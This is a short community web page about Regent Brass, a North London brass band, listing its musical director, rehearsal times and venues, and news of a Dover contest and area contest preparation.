Regent Brass are a British Brass Band, based at Chalk Farm, North London. Musical Director is Alan Duguid, and the band is currently in the Championship Section of the National Grading Tables. We rehearse on Thursdays from 1930, at the Salvation Army church, Chalk Farm, NW3 2BL.
Regent Community Brass was formed in 2012 as an expansion to the Regent Bands and welcomed our musical director Simon Tong in December 2021. If you are interested in playing with us, we rehearse on Tuesday in East Finchley.
On 11th Feburary, the band travelled to Dover to participate in the inaugural DFDS Seaways Open Brass Band Contest. The original set-up for the contest involved each band having to perform a hymn tune, solo feature and an additional work to a panel of three esteemed judges who each are respected examiners for the Associated Board of the Royal School of Music – Graham Harvey, Kenneth Peers and John Harper. 2012 begins with usual preparation for the L&SC Area Contest. This years test piece is Derek Bourgeois “Devil and the Deep Blue Sea”, quite a challenge. 2 weeks back, 2 full rehearsals, some new faces, some old faces, all enthusiastic getting back into the swing of things. In February Regent Brass will be participating the DFDS Seaways Contest in Dover.
